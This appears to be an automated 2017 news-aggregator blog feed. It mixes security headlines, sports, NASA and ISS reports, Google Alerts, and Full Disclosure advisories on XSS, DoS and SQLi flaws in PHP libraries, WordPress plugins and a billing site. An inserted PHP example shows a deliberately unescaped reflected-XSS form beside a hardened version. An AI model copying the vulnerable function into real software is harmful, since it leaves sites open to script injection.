Change the email on your existing account via your profile settings. anonymous. Joined 2 years ago · last seen in the past day. competitions novice.
from Google Alert - anonymous http://ift.tt/2rdZiSE
via IFTTT
Latest YouTube Video
Saturday, May 13, 2017
WannaCry Ransomware: It’s Not Over, Better Get Prepared for Next Wave of Attacks
If you are following the news, by now you might be aware that a security researcher has activated a "Kill Switch" to stop WannaCry ransomware from spreading further, which has already infected over 170,000 computers across 99 countries worldwide in just the past two days. For those unaware, WannaCry is an insanely fast-spreading ransomware malware that leverages a Windows SMB exploit to target a
from The Hacker News http://ift.tt/2rdxE8e
via IFTTT
Improve Anonymous Surveys to Make them fully Anonymous
One of our faculty noticed that surveys in Canvas can't be officially anonymous. Students need to know that their feedback is actually anonymous for.
from Google Alert - anonymous http://ift.tt/2rcZ9Pf
via IFTTT
Ravens: Money appears to be keeping Nick Mangold from joining team; both sides believed to still be interested - Jamison Hensley (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
I have a new follower on Twitter
UXscoops
We love to help #tech #authors #developers #amwriting #selfpublishing at better Twitter and social media marketing
Worldwide
https://t.co/cuamjUOLHh
Following: 9702 - Followers: 11634
May 13, 2017 at 08:05AM via Twitter http://twitter.com/UXscoops
Proxy list anonymous l1
We provide http and https (SSL) proxies. We have the best free proxies list. 186.103.239.190, 80, High Anonymous Proxy. HTTP, Chile, Santiago ...
from Google Alert - anonymous http://ift.tt/2pva4GI
via IFTTT
(eBook 13.05.2017) Author Anonymous by EK Blair torrents Download Free
Author Anonymous by E.K. Blair torrents Download Free DOWNLOAD eBook Author Anonymous by E.K. Blair for iphone,kindle,android,i... - Dutch ...
from Google Alert - anonymous http://ift.tt/2puVBL4
via IFTTT
I have a new follower on Twitter
Domain105
IT Architect, photographer, parent and all round nice guy.
West Midlands, England
https://t.co/IDyXR4Qx9w
Following: 3036 - Followers: 2250
May 13, 2017 at 05:45AM via Twitter http://twitter.com/Domain105
Protect Against WannaCry: Microsoft Issues Patch for Unsupported Windows (XP, Vista, 8,...)
In the wake of the largest ransomware attack in history, which has already infected over 114,000 Windows systems worldwide in the last 24 hours, Microsoft just took an unusual step to protect its customers with out-of-date computers. Microsoft has just released an emergency security patch update for all its unsupported versions of Windows, including Windows XP, Vista, Windows 8, Server 2003
from The Hacker News http://ift.tt/2raVRvf
via IFTTT
I have a new follower on Twitter
Arijana Ramic
I tell jokes and am an office manager for @Socedo. Tweets in English, Bosnian, and Spanish.
Following: 22257 - Followers: 22957
May 13, 2017 at 04:00AM via Twitter http://twitter.com/ArijanaRamic
Anonymous - Managers
Anonymous - Managers – Boston Restaurant Jobs - BostonChefs.com's Industry Insider, the best jobs at Boston restaurants.
from Google Alert - anonymous http://ift.tt/2rb0JjO
via IFTTT
Planet Aurora
What bizarre alien planet is this? It's planet Earth of course, seen from the International Space Station through the shimmering glow of aurorae. About 400 kilometers (250 miles) above Earth, the orbiting station is itself within the upper realm of the auroral displays. Aurorae have the signature colors of excited molecules and atoms at the low densities found at extreme altitudes. Emission from atomic oxygen dominates this view. The eerie glow is green at lower altitudes, but a rarer reddish band extends above the space station's horizon. Also visible from the planet's surface, this auroral display began during a geomagnetic storm. The storm was triggered after a coronal mass ejection impacted Earth's magnetosphere in June of 2015. via NASA http://ift.tt/2pGaiXL
Friday, May 12, 2017
The Shakespeare Tarot Key
Buy The Shakespeare Tarot Key book by author Anonymous. Preview and learn more about this self-published Literature & Fiction book.
from Google Alert - anonymous http://ift.tt/2pHO5IF
via IFTTT
Anonymous donor treats Food for Lane County volunteers to dinner
EUGENE, Ore -- Food for Lane County has been a part of the Eugene community since 1984. For the past 12 years, the organization has had a dining ...
from Google Alert - anonymous http://ift.tt/2qC1upQ
via IFTTT
Stored Credentials being reset to Anonymous
I have multiple data sources configured in my web service. They are all different endpoints, but the same logic. I use an OData connection to connect.
from Google Alert - anonymous http://ift.tt/2rba8sn
via IFTTT
Orioles: Adam Jones donates $20K to Negro Leagues Baseball Museum, plans to visit and speak with museum president on Saturday (ESPN)
from ESPN http://ift.tt/1eW1vUH
via IFTTT
Massive Ransomware Attack That's Hitting World Right Now Uses NSA's Exploit
Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date. The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY'). Like other nasty
from The Hacker News http://ift.tt/2r96yhZ
via IFTTT
Former Browns and Ravens WR Michael Jackson, 48, dies in motorcycle accident; played eight seasons in NFL (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
Anonymous donors will match up to $80000!
We're excited to share that an anonymous group of caring donors is promising to match every gift we receive by June 9th – dollar for dollar – up to ...
from Google Alert - anonymous http://ift.tt/2ptplbn
via IFTTT
Botnet Sending 5 Million Emails Per Hour to Spread Jaff Ransomware
A massive malicious email campaign that stems from the Necurs botnet is spreading a new ransomware at the rate of 5 million emails per hour and hitting computers across the globe. Dubbed "Jaff," the new file-encrypting ransomware is very similar to the infamous Locky ransomware in many ways, but it is demanding 1.79 Bitcoins (approx $3,150), which is much higher than Locky, to unlock the
from The Hacker News http://ift.tt/2pt1fxg
via IFTTT
SportsCenter Video: Seahawks, Cardinals and Ravens are possible landing spots for Colin Kaepernick - Herm Edwards (ESPN)
from ESPN http://ift.tt/17lH5T2
via IFTTT
Servants Anonymous book sale offers magic of written word
Darlene Nemeth, Marj Challand, and Pat LaTouche have each contributed more than a decade of volunteering for the Servants Anonymous Society ...
from Google Alert - anonymous http://ift.tt/2qao9Il
via IFTTT
Anonymous Jobs
Look at Anonymous profile and browse the latest full & part-time jobs and vacancies in the UK - 301187 - CV-Library.
from Google Alert - anonymous http://ift.tt/2pFtNyP
via IFTTT
ISS Daily Summary Report – 5/11/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 4. The media in all four of the habitats are changed in this second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Fine Motor Skills (FMS): The crew completed a series of interactive tasks during an FMS session today. The FMS investigation studies how fine motor skills are affected by long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of the investigation is to determine how fine motor performance in microgravity trends/varies over the duration of a six-month and year-long space mission; how fine motor performance on orbit compares with that of a closely matched participant on Earth; and how performance trends/varies before and after gravitational transitions, including periods of early flight adaptation and very early/near immediate post-flight periods. Extravehicular Activity (EVA) Preparations: In preparation for tomorrow’s planned EXPRESS Pallet Controller Assembly (ExPCA) EVA, the crew verified that tools are configured properly and that batteries are installed in Pistol Grip Tools and cameras. They also performed a final procedures review and conference with ground teams followed by final Equipment Lock preparation. Egress is scheduled tomorrow at 7:10AM CDT.
Today’s Planned Activities All activities were completed unless otherwise noted. MARES battery discharge process initiation Personal Data Prep for Return ISS Food Intake Tracker – Screenshot Captures IMS Delta file prep URAGAN. Observation and photography EKON-M. Observations and photography OsteoOmics MELFI Removal Health Maintenance System (HMS) Periodic Health Status (PHS) Pre EVA Examination Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ Fine Motor Skills Experiment Test – Subject MARES knee configuration deinstallation Health Maintenance System (HMS) Pre-EVA Periodic Health Status Examination – Stow S/G2 MRM2 Comm Config Equipment gathering for Orlan-ISS No.5 Ops Combustion Integrated Rack Alignment Guide Install Environmental Health System (EHS) Acoustic Dosimeters – Data Transfer and Stow Orlan-ISS No.5 Elements Deinstallation ExPress Carrier Avionics Configuration Extravehicular Activity (EVA) Tool Configuring MARES battery discharge status control Comm reconfig for nominal ops Extravehicular Activity (EVA) iPad Contingency Procedures preparation OsteoOmics MELFI/MERLIN Transfer Nikon still camera sync with station time Download Pille Dosimeter Readings Extravehicular Activity (EVA) Tool Audit SARCOLAB. MARES files transfer verification and shutdown OsteoOmics Media Relocate Pille Sensor prep for USOS EVA Extravehicular Activity (EVA) Procedure Review SARCOLAB. PEMS and EMG final stowage SARCOLAB. EPM Laptop relocation for files downlink preparation MSPR GCM Component Deactivation [Deferred] OsteoOmics Media Change Recharging Soyuz 733 Samsung PC Battery (if charge level is below 80%) MARES disconnection and stowage Казбек Fit Check Robotic Workstation (RWS) Setup PILOT-T. Preparation for the experiment Health Maintenance System (HMS) Food Frequency Questionnaire (FFQ) or ISS Food Intake Tracker (ISS FIT) SSC DOUG Setup for EVA MARES stowage assistance PILOT-T. Experiment Ops KASKAD. 
Manual mixing RWS Video Checkout Extravehicular Activity (EVA) Procedure Conference PILOT-Т. Closeout Evening Preparation Work Equipment Lock (E-LK) Preparation LAB BelAir Wireless Access Point (WAP) Verification MARES-EPM Hard Disk removal and stowage Cabin restow after MARES Closure of SM window shutters 6, 8, 9, 12, 13, 14 Completed Task List Items Veg03 Plant Water/Photo Ground Activities All activities were completed unless otherwise noted. EVA procedures conference MSS power up Three-Day Look Ahead: Friday, 05/12: ExPCA EVA #42 Saturday, 05/13: Water dispensing for Electrowetting Drawer, Skinsuit height measurement, EVA camera disassembly/Airlock deconfig/debrief Sunday, 05/14: Crew off duty, Fluid Shifts hardware gather, Ultrasound setup in Russian Segment QUICK ISS Status – Environmental Control Group: Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off
from ISS On-Orbit Status Report http://ift.tt/2r9nvJA
via IFTTT
django-custom-anonymous 0.2
django-custom-anonymous 0.2. Download django-custom-anonymous-0.2.tar.gz. Library provides customization of AnonymousUser in Django.
from Google Alert - anonymous http://ift.tt/2r99prO
via IFTTT
Learn to Code: Get 10 Best Online Training Courses for Just $49 (Limited-Time 95% OFF)
Struggling to learn how to code? If you’re looking to 'learn how to code' and seeking a career as an expert-level programmer, you should know how to play with code and make your own. It's no secret that mastering a coding language or two can put you at the top of the job market – thanks to the boom in technology. Today, you can elevate your programming skills straight from the Internet to
from The Hacker News http://ift.tt/2pFrqwJ
via IFTTT
Microsoft Brings Ubuntu, Suse, and Fedora Linux to Windows Store
Microsoft has been expressing its love for Linux and Open Source for almost three years now, and this love keeps growing as time passes. Just last year, Microsoft made headlines by building support for the Bash shell and Ubuntu Linux binaries into Windows 10, allowing users to run limited instances of Linux directly on top of the OS without installing any virtual machine, as well as developers
from The Hacker News http://ift.tt/2pFaeXs
via IFTTT
Forget Anonymous Sources, Trump's Lies Stand Above All
The mainstream media (and by extension, commentators, and commentary websites) got burned over the last several days on anonymously sourced ...
from Google Alert - anonymous http://ift.tt/2pFyae3
via IFTTT
[InsideNothing] Web Development liked your post "[InsideNothing] hitebook.net liked your post "[FD] Kajona 4.7: XSS & Directory Traversal""
Source: Gmail -> IFTTT-> Blogger
Unpatched 0-Days in Vanilla Forums Let Remote Attackers Hack Websites
A security researcher has publicly disclosed two critical zero-day vulnerabilities in Vanilla Forums, an open source software that powers discussion on over 500,000 websites, which could allow unauthenticated, remote attackers to fully compromise targeted websites easily. Discovered by Polish security researcher Dawid Golunski of Legal Hackers, two separate unpatched vulnerabilities, a remote
from The Hacker News http://ift.tt/2r0uQhz
via IFTTT
M13: The Great Globular Cluster in Hercules
In 1716, English astronomer Edmond Halley noted, "This is but a little Patch, but it shews itself to the naked Eye, when the Sky is serene and the Moon absent." Of course, M13 is now less modestly recognized as the Great Globular Cluster in Hercules, one of the brightest globular star clusters in the northern sky. Telescopic views reveal the spectacular cluster's hundreds of thousands of stars. At a distance of 25,000 light-years, the cluster stars crowd into a region 150 light-years in diameter. Approaching the cluster core upwards of 100 stars could be contained in a cube just 3 light-years on a side. For comparison, the closest star to the Sun is over 4 light-years away. Along with the cluster's dense core, the outer reaches of M13 are highlighted in this sharp color image. The cluster's evolved red and blue giant stars show up in yellowish and blue tints. via NASA http://ift.tt/2qVE9iG
Thursday, May 11, 2017
I have a new follower on Twitter
toastate
#Serverless applications are about to move forward to the next step!
https://t.co/kZvEHjWmFg
Following: 5001 - Followers: 3448
May 11, 2017 at 11:55PM via Twitter http://twitter.com/toastate
Views page not accessible by anonymous users
Individual articles are still accessible by anonymous users, so it appears to be an issue with this views page. I have other views which create blocks ...
from Google Alert - anonymous http://ift.tt/2qZZvvw
via IFTTT
Français (France)
Nowadays, Fast food is the preferred choice, but how safe is this food? Sometimes does the industry cut out corners just to make a quick buck, and ...
from Google Alert - anonymous http://ift.tt/2r6dbkN
via IFTTT
Français (France)
One man was so sick of high electricity prices he has created his own way of making constant hot water – without the need for electricity.
from Google Alert - anonymous http://ift.tt/2q7sGvx
via IFTTT
Narcotics Anonymous will hold campout
ALBION— A Narcotics Anonymous campout will be held Friday, June 23 through Sunday, June 25, at Chain O' Lakes State Park, 2533 E. C.R. 75S, ...
from Google Alert - anonymous http://ift.tt/2r7hbT1
via IFTTT
All OnePlus Devices Vulnerable to Remote Attacks Due to 4 Unpatched Flaws
There is really bad news for all OnePlus lovers. A security researcher has discovered four vulnerabilities that affect all OnePlus handsets, including One, X, 2, 3 and 3T, running the latest versions of OxygenOS 4.1.3 (worldwide) and below, as well as HydrogenOS 3.0 and below (for Chinese users). One of the unpatched vulnerabilities allows a Man-in-the-Middle (MitM) attack against OnePlus
from The Hacker News http://ift.tt/2qxiuxI
via IFTTT
The Anonymous Noise Season 1 Episode 5
1 Episode 5 ) online HD. The Anonymous Noise Season 1 Episode 5 Watch Episode. Stream. CLICK LINK >>> The Anonymous Noise Season 1.
from Google Alert - anonymous http://ift.tt/2r58aZT
via IFTTT
Three Chinese Hackers Fined $9 Million for Stealing Trade Secrets
Hackers won't be spared. Three Chinese hackers have been ordered to pay $8.8 million (£6.8 million) after hacking email servers of two major New York-based law firms to steal corporate merger plans in December 2016 and used them to trade stocks. The U.S. District Judge Valerie Caproni in Manhattan sued 26-year-old Iat Hong, 30-year-old Bo Zheng, and 50-year-old Hung Chin, over a multi-million
from The Hacker News http://ift.tt/2pp06a8
via IFTTT
“Anonymous” hacking group says to prepare for World War 3
The shadowy hacking group “Anonymous” just dropped a bomb, figuratively speaking, on the planet with an equally cryptic warning: We should all be ...
from Google Alert - anonymous http://ift.tt/2pC9SAQ
via IFTTT
Beware! Built-in Keylogger Discovered In Several HP Laptops
Do you own a Hewlett-Packard (HP) laptop? Yes? Just stop whatever you are doing and listen carefully: Your HP laptop may be silently recording everything you are typing on your keyboard. While examining Windows Active Domain infrastructures, security researchers from the Switzerland-based security firm Modzero have discovered a built-in keylogger in an HP audio driver that spies on all your
from The Hacker News http://ift.tt/2q6cGtL
via IFTTT
ISS Daily Summary Report – 5/10/2017
OsteoOmics: The crew changed BioCell media in BioCell Habitat 3. The media in all four of the habitats will be changed in this second of four weeks of OsteoOmics operations. Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone. Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Myotendinous and Neuromuscular Adaptation to Long-term Spaceflight (Sarcolab)-3: Today’s second operational day for the Sarcolab-3 experiment began with converting the Muscle Atrophy Research & Exercise System (MARES) from the ankle measurement configuration to the knee measurement configuration. The subject donned the Percutaneous Electrical Muscle Stimulator (PEMS) and Electromyography (EMG) electrodes to stimulate and measure calf muscle and tendon response at the back of the knee (calf muscle origin). During the knee joint evaluation, the subject sat on the MARES dynamometer with the chair and pantograph set to obtain knee flexion and extension from a 90 degree knee angle to full extension with the knee torque adapter securely fixed to the shin. The inflight data will be compared to preflight and postflight measurements to measure the impact of a hypothesized microgravity-induced muscle loss. Sarcolab investigates the adaptation and deterioration of the soleus, or calf muscle, where it joins the Achilles tendon which links it to the heel and carries loads from the entire body.
Muscle fiber samples are taken from crew members before and after flight, and analyzed for changes in structural and chemical properties. MRI and ultrasound tests and electrode stimulation are conducted to help assess muscle and tendon changes caused by microgravity exposure. Phase Change Heat Exchanger (PCHx): The crew removed the Wax Tray from the PCHx and stowed it for return on SpaceX 11. The objective of the PCHx Project is to create a unique test platform to advance the technology readiness level of phase change heat exchangers for infusion into future exploration vehicles. Phase change material heat exchangers are a useful technology that helps certain space missions in regulating the thermal conditions on their particular spacecraft. They serve as a supplemental heat rejection device during time-varying heat loads and/or transient environments. It does so by storing waste energy by melting a phase change material during peak loads. It can then reject this energy through a radiator when conditions allow, causing the phase change material to freeze. European Space Agency (ESA) Active Dosimeter Swap: The crew retrieved dosimeters worn by crewmembers and deployed them in the Columbus module, Node 3 and the Service Module. The European Crew Personal Active Dosimeter is worn by European ISS crewmembers on orbit to measure radiation exposure. This device, coupled with other dosimeters in the Columbus Laboratory, provides radiation dosage information that can be used to support risk assessment and dose management. The goal is to enable the verification of radiation monitoring systems for future medical monitoring of crewmembers in space. Extravehicular Activity (EVA) Preparations: The crew completed the following in preparation for Friday’s planned EXPRESS Pallet Controller Assembly (ExPCA) EVA. 
Detailed timeline and procedures review Briefing package review Tool configuration summary review Added EVA specific pages to the cuff checklist On-Board Training (OBT) Emergency Response: All crew members participated in a rapid depress emergency scenario and completed the following objectives: Practiced ISS emergency response with crew and ground roles based on information provided by simulator displays. Physically translated through the ISS to appropriate response locations to visualize use of ISS equipment and interfaces. Practiced procedure execution and associated decision making based on cues provided by the simulator. Practiced communication and coordination with Mission Control Center (MCC)-Houston and MCC-Moscow as required for a given emergency scenario. Mobile Servicing System (MSS) Operations: Yesterday afternoon, Robotics Ground Controllers powered up the MSS, configured and stowed the Special Purpose Dexterous Manipulator (SPDM) on Mobile Base System (MBS) Power Data Grapple Fixture 2 (PDGF2) using the Space Station Robotic Manipulator System (SSRMS). After stowing the SPDM, Controllers translated the Mobile Transporter from Worksite 3 (WS3) to WS4 and maneuvered the SSRMS into config for Friday’s ExPCA EVA. Today’s Planned Activities All activities were completed unless otherwise noted. Personal Data Prep for Return IMS Delta file prep EKON-M. Observations and photography Environmental Health System (EHS) Acoustic Dosimeter Operations – Setup Dosimeter for Static Measurement EVA Procedure Review OsteoOmics Media Relocate Water Transfer from Progress 435 (DC1) H2O Tank 2 to ЕДВ and H2O Tank 2 Bladder Compression Recharging Soyuz 735 Samsung PC Battery (if charge level is below 80%) Phase Change HX Circuit Breaker OFF SARCOLAB. MARES knee configuration installation MARES Knee Shaving Preparation Wax Tray Remove CONSTANTA-2. 
Cassette removal from ТБУ-В and setup on panel for 1-hour warmup EMG electrodes installation and Sarcolab knee protocol execution SARCOLAB MARES subject electrodes equipment assistance RGN Wastewater Storage Tank Assembly (WSTA) Fill OsteoOmics Media Change CONSTANTA-2. Preparation and Execution 5 Electro-Wetting Drawer Install 1 Google Photo Transfer [Failed] VIZIR. Preparation Steps Combustion Integrated Rack Alignment Guide Removal Habitability Narrated Task Video Setup – Subject Training for Emergency Response On-board ISS Extravehicular Mobility Unit (EMU) Cuff Checklist Print Habitability Narrated Task Video End – Subject Private Psychological Conference (PPC) VIZIR. Closeout Ops Electro-Wetting Drawer Install 2 Initiate water transfer from CWC-I to ЕДВ Glacier Sample Remove EVA Pen and Ink Update ECCO MELFI insert [Deferred] NanoRacks Module-55 Gear-Sample Swap CASKAD. Manual Mixing in Bioreactor Verification of ИП-1 Flow Sensor Position For Mini ESA Thermal Container NanoRacks Keyboard Troubleshooting Terminate Soyuz 735 Samsung PC Battery Charge (as necessary) On-board Training (OBT) ISS Emergency Drill Conference Terminate water transfer from CWC-I to ЕДВ Environmental Health System (EHS) – Formaldehyde Monitoring Kit (FMK) Stow Operation VIZIR. Download […]
from ISS On-Orbit Status Report http://ift.tt/2r44I1O
via IFTTT
[FD] DefenseCode ThunderScan SAST Advisory: GOOGLE google-api-php-client Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory
GOOGLE google-api-php-client Multiple Security Vulnerabilities

Advisory ID: DC-2017-04-012
Advisory Title: google-api-php-client Multiple XSS Vulnerabilities
Advisory URL: http://ift.tt/2pASUCR
Software: google-api-php-client
Software Language: PHP
Version: 2.1.3 and below
Vendor Status: Vendor contacted, vulnerability confirmed
Release Date: 2017-05-10
Risk: Medium

1. General Overview
===================

During the security audit of google-api-php-client (Google's PHP client library for accessing Google APIs), multiple XSS vulnerabilities were discovered using the DefenseCode ThunderScan SAST application source code security analysis platform. More information about ThunderScan SAST is available at URL: http://ift.tt/Vn2J4r

2. Software Overview
====================

According to the API developers, the Google API Client Library enables you to work with Google APIs such as Google+, Drive, or YouTube on your server. The developers further noted: "This client library is in beta. We will make an effort to support the library and maintain backwards compatibility in the future, but we reserve the right to make incompatible changes when necessary."

Homepage: http://ift.tt/ZIdowR http://ift.tt/1aHqxFd

3. Brief Vulnerability Description
==================================

During the security analysis, ThunderScan SAST discovered a Cross-Site Scripting vulnerability in Google's PHP client library for accessing Google APIs (google-api-php-client). The vulnerabilities were found in the sample code for using Google's URL Shortener. The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email or posting it as part of a comment on the vulnerable site or another forum. Once the unsuspecting user has visited such a URL, the attacker can proceed to send requests to the API on behalf of the victim from the attacker's JavaScript.

3.1. Cross-Site Scripting

Vulnerable Function:
Variable: $_SERVER['PHP_SELF']
Vulnerable URL: http://ift.tt/2po72nZ
File: google-api-php-client\examples\url-shortener.php
[FD] DefenseCode WebScanner DAST Advisory: WordPress User Access Manager Plugin Security Vulnerability
DefenseCode WebScanner DAST Advisory
WordPress User Access Manager Plugin Security Vulnerability

Advisory ID: DC-2017-01-021
Advisory Title: WordPress User Access Manager Plugin Cross Site Scripting vulnerability
Advisory URL: http://ift.tt/2r4RhPN
Software: WordPress User Access Manager
Software Language: PHP
Version: 1.2.14 and below
Vendor Status: Vendor contacted, vulnerability fixed
Release Date: 20170510
Risk: Medium

1. General Overview
===================

During the security audit of the User Access Manager plugin for WordPress CMS, a Cross Site Scripting vulnerability was discovered using the DefenseCode WebScanner application security analysis platform. More information about WebScanner is available at URL: http://ift.tt/Vn2J4r

2. Software Overview
====================

According to the developers, the User Access Manager plugin can be used to manage the access to your posts, pages, categories and files. It has more than 40,000 downloads on wordpress.org.

Homepage: http://ift.tt/1yendO2

3. Brief Vulnerability Description
==================================

During the security analysis, WebScanner discovered a Cross-Site Scripting vulnerability in the User Access Manager Plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct a URL that contains malicious JavaScript code. If the administrator of the site makes a request to such a URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email or posting it as part of a comment on the vulnerable site or another forum. Due to the missing nonce token, the vulnerability is also directly exposed to other, indirect, attack vectors.

3.1. Cross-Site Scripting

Function: echo()
Variable: $_GET['id']
Vulnerable URL: http://ift.tt/2r53HXM
File: user-access-manager\tpl\adminGroup.php
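Both DefenseCode advisories above describe the same reflected-XSS pattern: a request-controlled string ($_SERVER['PHP_SELF'] in the url-shortener sample, $_GET['id'] in the plugin's adminGroup.php) echoed into HTML without escaping. The following is an added example, not DefenseCode's code nor either project's code; the function names and the sample request values are constructed for this demonstration, and it shows the vulnerable pattern beside a hardened form.

```php
<?php
// Added example (not from the advisories or the projects): the unescaped-echo
// reflected-XSS pattern, beside a hardened rendering of the same form.
// Function names and the request arrays below are constructed for this demo.

declare(strict_types=1);

// Vulnerable pattern: request-controlled strings are concatenated straight into
// markup. PHP_SELF includes any PATH_INFO suffix appended to the request URL,
// and $_GET['id'] is arbitrary, so either can break out of the attribute.
function render_form_vulnerable(array $server, array $get): string
{
    $self = $server['PHP_SELF'] ?? '';
    $id   = $get['id'] ?? '';
    return '<form action="' . $self . '">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '</form>';
}

// Escape for the HTML attribute context: ENT_QUOTES neutralises both quote
// characters, ENT_SUBSTITUTE avoids returning an empty string on bad UTF-8.
function esc_attr_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: validate the expected shape of the input first, then
// escape everything that reaches the output regardless of where it came from.
// (In a WordPress admin page the handler would additionally verify a nonce,
// e.g. with check_admin_referer(), which the second advisory notes is missing.)
function render_form_hardened(array $server, array $get): string
{
    // SCRIPT_NAME does not carry the PATH_INFO suffix that PHP_SELF does;
    // it is still escaped below rather than trusted.
    $self = $server['SCRIPT_NAME'] ?? '';

    // Whitelist: the id is expected to be a short decimal number; anything
    // else is dropped rather than reflected.
    $id = (string) ($get['id'] ?? '');
    if (!preg_match('/^[0-9]{1,10}$/', $id)) {
        $id = '';
    }

    return '<form action="' . esc_attr_html($self) . '">'
         . '<input type="hidden" name="id" value="' . esc_attr_html($id) . '">'
         . '</form>';
}

// Constructed request: the path and the id both carry quote and angle
// characters, the kind that break out of an attribute if not escaped.
$server = [
    'SCRIPT_NAME' => '/examples/url-shortener.php',
    'PHP_SELF'    => '/examples/url-shortener.php/"><b>broken-out</b>',
];
$get = ['id' => '42"><i>x</i>'];

echo render_form_vulnerable($server, $get), PHP_EOL;
// The vulnerable output closes the action/value attributes early and renders
// the injected tags as markup.

echo render_form_hardened($server, $get), PHP_EOL;
// The hardened output keeps action="/examples/url-shortener.php", drops the
// malformed id, and would render any remaining special characters as
// &quot; &lt; &gt; rather than as markup.
```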
Source: Gmail -> IFTTT-> Blogger
[FD] trashbilling.com and Trashflow 3.0.0 Multiple Issues
A blog post with information located here: http://ift.tt/2pmPEQd

============
Introduction
============
This was a basic vulnerability analysis of trashbilling.com (which I am required to use to pay my trash bill), and Trashflow 3.0, which updates trashbilling.com from the Trash Hauler side. My disclosure intent was to force Ivy Computers Inc to re-assess their security posture as it was severely lacking. This is a full disclosure following their 90 day remediation period.

============
List Summary
============
trashbilling.com:
- Account enumeration/PII Leak [major]: trashbilling.com uses client side identification without a password to access billing software, revealing names/email/address/phone as well as partial CC data.
  > This client side validation is unobfuscated javascript
- SQLI [major] - vulnerability contained in CC update field, giving access to billing database, on any user
- XSS [minor] - vulnerability in email update field
- DOS [minor] - no restriction on setting another user's password, could block all users from accessing their data

Trashflow 3.0:
- Hardcoded credentials [medium] - FTP hardcoded credentials available in plaintext during backup and update software operations
- Hardcoded credentials [medium] - Software billing credentials hardcoded in helper binary cash_drawer_cc.exe (allows editing of user billing data)
- Public Exploits [medium] - FTP servers run off vsFTPd 2.0.5, risking numerous DOS vulnerabilities
Source: Gmail -> IFTTT-> Blogger
[FD] DefenseCode ThunderScan SAST Advisory: WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities
DefenseCode ThunderScan SAST Advisory
WordPress Tracking Code Manager Plugin Multiple Security Vulnerabilities

Advisory ID: DC-2017-01-020
Advisory Title: WordPress Tracking Code Manager Plugin Multiple Vulnerabilities
Advisory URL: http://ift.tt/2pC6FlA
Software: WordPress Tracking Code Manager
Software Language: PHP
Version: 1.11.1 and below
Vendor Status: Vendor contacted
Release Date: 2017-05-10
Risk: Medium

1. General Overview
===================
During the security audit of the Tracking Code Manager plugin for WordPress CMS, multiple vulnerabilities were discovered using the DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://ift.tt/Vn2J4r

2. Software Overview
====================
According to the developers, Tracking Code Manager is a plugin to manage all your tracking code and conversion pixels, simply. Compatible with Facebook Ads, Google Adwords, WooCommerce, Easy Digital Downloads, WP eCommerce. It has more than 40,000 downloads on wordpress.org.
Homepage: http://ift.tt/1y7dL4e

3. Brief Vulnerability Description
==================================
During the security analysis, ThunderScan discovered Cross-Site Scripting and remote Denial of Service vulnerabilities in the Tracking Code Manager plugin. The Denial of Service requires only one visit to a specific URL, after which the whole WordPress installation becomes completely unresponsive until restart. The DoS is based upon the ability of the user to select and call a function of their choice (while satisfying specific conditions). By making a recursive call to the function that handles the request (tcmp_do_action()), a DoS can easily be accomplished. Both vulnerabilities can be found in the settings section of the plugin, and can be remotely triggered due to the missing nonce token and validation.
Since the DoS vulnerability relies on GET requests and is missing the nonce token, the vulnerability is also directly exposed to attack vectors such as Cross Site Request Forgery (CSRF). The DoS vulnerability was confirmed on Windows OS.

3.1 Cross-Site Scripting
URL Parameter: tcmp_action
Vulnerable URL: http://ift.tt/2r3rzug

3.2. Denial of Service
Function: tcmp_do_action()
Vulnerable URL: http://ift.tt/2pnomcC

4. Solution
===========
The vendor should resolve the security issues in the next release. All users are strongly advised to update the WordPress Tracking Code Manager plugin to the latest available version as soon as the vendor releases an update.

5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer by Neven Biruski

6. Disclosure Timeline
======================
04/04/2017 Vendor contacted
07/04/2017 Vendor responded: "We will fix it in the next update"
10/05/2017 Advisory released to the public

7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities.
